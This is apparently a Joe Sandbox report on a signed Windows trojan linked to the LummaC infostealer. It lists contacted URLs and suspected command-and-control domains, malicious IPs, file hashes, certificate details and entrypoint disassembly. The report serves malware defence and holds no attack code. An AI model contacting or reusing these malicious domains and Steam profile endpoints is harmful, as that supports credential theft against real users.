https://gravvitywio.store/_	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://delaylacedmn.site/apiR	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.certum.pl/CPS0	webNY0O9Sr.exe	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cevcsca2021.ocsp-certum.com07	webNY0O9Sr.exe	false		unknown
https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal	webNY0O9Sr.exe	false		unknown
https://commandejorsk.site/api#	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gravvitywio.store/apiI	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/points/shop/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	webNY0O9Sr.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.certum.pl/CPS0	webNY0O9Sr.exe	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manage.windowsazure.com/publishsettings/indexqbusiness.cn-northwest-1.api.amazonwebservices.	webNY0O9Sr.exe	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://delaylacedmn.site/api	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292152359.000000000310D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.000000000310D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.000000000310D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://writekdmsnu.site/apii	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/account/cookiepreferences/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nurserrsjwuwq.shop/api3	BitLockerToGo.exe, 00000002.00000002.2291978726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.00000000030FC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin	webNY0O9Sr.exe	false		unknown
https://store.steampowered.com/about/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/badges	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	nurserrsjwuwq.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
172.67.209.193	gravvitywio.store	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524042
Start date and time:	2024-10-02 15:05:39 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	webNY0O9Sr.exe renamed because original name is a hash value
Original Sample Name:	8f37465d74be6e785296584fe6d4e5a8bd9f09c6a9db38c9a377c28ca25da986.exe
Detection:	MAL
Classification:	mal93.troj.evad.winEXE@3/0@11/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 75% Number of executed functions: 9 Number of non-executed functions: 111
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target webNY0O9Sr.exe, PID 6332 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: webNY0O9Sr.exe

Simulations

Behavior and APIs

Time	Type	Description
09:06:52	API Interceptor	3x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	http://Asm.alcateia.org	Get hash	malicious	HTMLPhisher	Browse	asm.alcateia.org/
	hbwebdownload - MT 103.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm
172.67.209.193	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	Google_Chrome.exe	Get hash	malicious	LummaC	Browse
	https://finalstepgetshere.com/uploads/beta111.zip	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gravvitywio.store	klFMCT64RF.exe	Get hash	malicious	LummaC	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
nurserrsjwuwq.shop	klFMCT64RF.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.96.3
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.96.3
steamcommunity.com	klFMCT64RF.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	klFMCT64RF.exe	Get hash	malicious	LummaC	Browse	172.67.183.74
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	35Mcl9DxHR.exe	Get hash	malicious	Unknown	Browse	172.67.178.253
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.188.210
AKAMAI-ASUS	klFMCT64RF.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254
CLOUDFLARENETUS	klFMCT64RF.exe	Get hash	malicious	LummaC	Browse	172.67.183.74
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	35Mcl9DxHR.exe	Get hash	malicious	Unknown	Browse	172.67.178.253
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.188.210

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	klFMCT64RF.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.102.49.254 172.67.209.193 188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.408834265249934
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	webNY0O9Sr.exe
File size:	11'801'336 bytes
MD5:	d3a46bd951e1bb457349dac15c09098e
SHA1:	a0ce8454ce4077858ac8b3ce17f410634f0f0493
SHA256:	8f37465d74be6e785296584fe6d4e5a8bd9f09c6a9db38c9a377c28ca25da986
SHA512:	66686e1fc4eda455c80808da2345a71fdf14022f73e0e0dfb12bd7206a949fb45303bf5b96b6ffd020ca5306e9852cf2291f573713df276a01d8449d93de7138
SSDEEP:	98304:EdtD8zVLzK0LZ1IGhos6BYA12PAsFPWFm:LsgsKPvPWFm
TLSH:	71C61851FE8751F1ED031970559BA32BA3386D059B38878BFB247E69EC372922C37249
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................4.........`........p....@.......................................@................................

File Icon


Icon Hash:	d18eb3ababb3c403

Static PE Info

General

Entrypoint:	0x46d460
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	4f2f006e2ecf7172ad368f8289dc96c1

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	09/09/2024 11:06:13 09/09/2025 11:06:12
Subject Chain	CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	62A1343435FC5131E11FA8C871BB3A1B
Thumbprint SHA-1:	A3AFF46C5F8E2A1F750C570698B864E75553E61F
Thumbprint SHA-256:	87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
Serial:	332576FE101609502C23F70055B4A3BE

Entrypoint Preview

Instruction
jmp 00007F93484F0560h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007F93484D4D46h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007F93484F29B4h
cld
call 00007F93484F1A4Eh
call 00007F93484F0689h
add esp, 08h
ret
jmp 00007F93484F2860h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007F93484F2861h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb54000	0x45e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb86000	0x3e74	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb3ea00	0x28f8	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb55000	0x2fa52	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xab8b40	0xb8	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x34fa18	0x34fc00	ac7d46aefc200ccd98ab7fe7dc751e44	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x351000	0x765a5c	0x765c00	1571dafc64eca70d288560a6c42310f7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xab7000	0x9cbc0	0x54a00	893c14be2c89e447ab8a3c5bd75ae312	False	0.37279011262924666	data	5.492331686764051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb54000	0x45e	0x600	219fc5df15fece1ba3cc0f08b1e51b4f	False	0.361328125	data	3.881975032284258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xb55000	0x2fa52	0x2fc00	37218e181f5bd9ff844da61065aa22e1	False	0.5861522414921466	data	6.689698072628621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
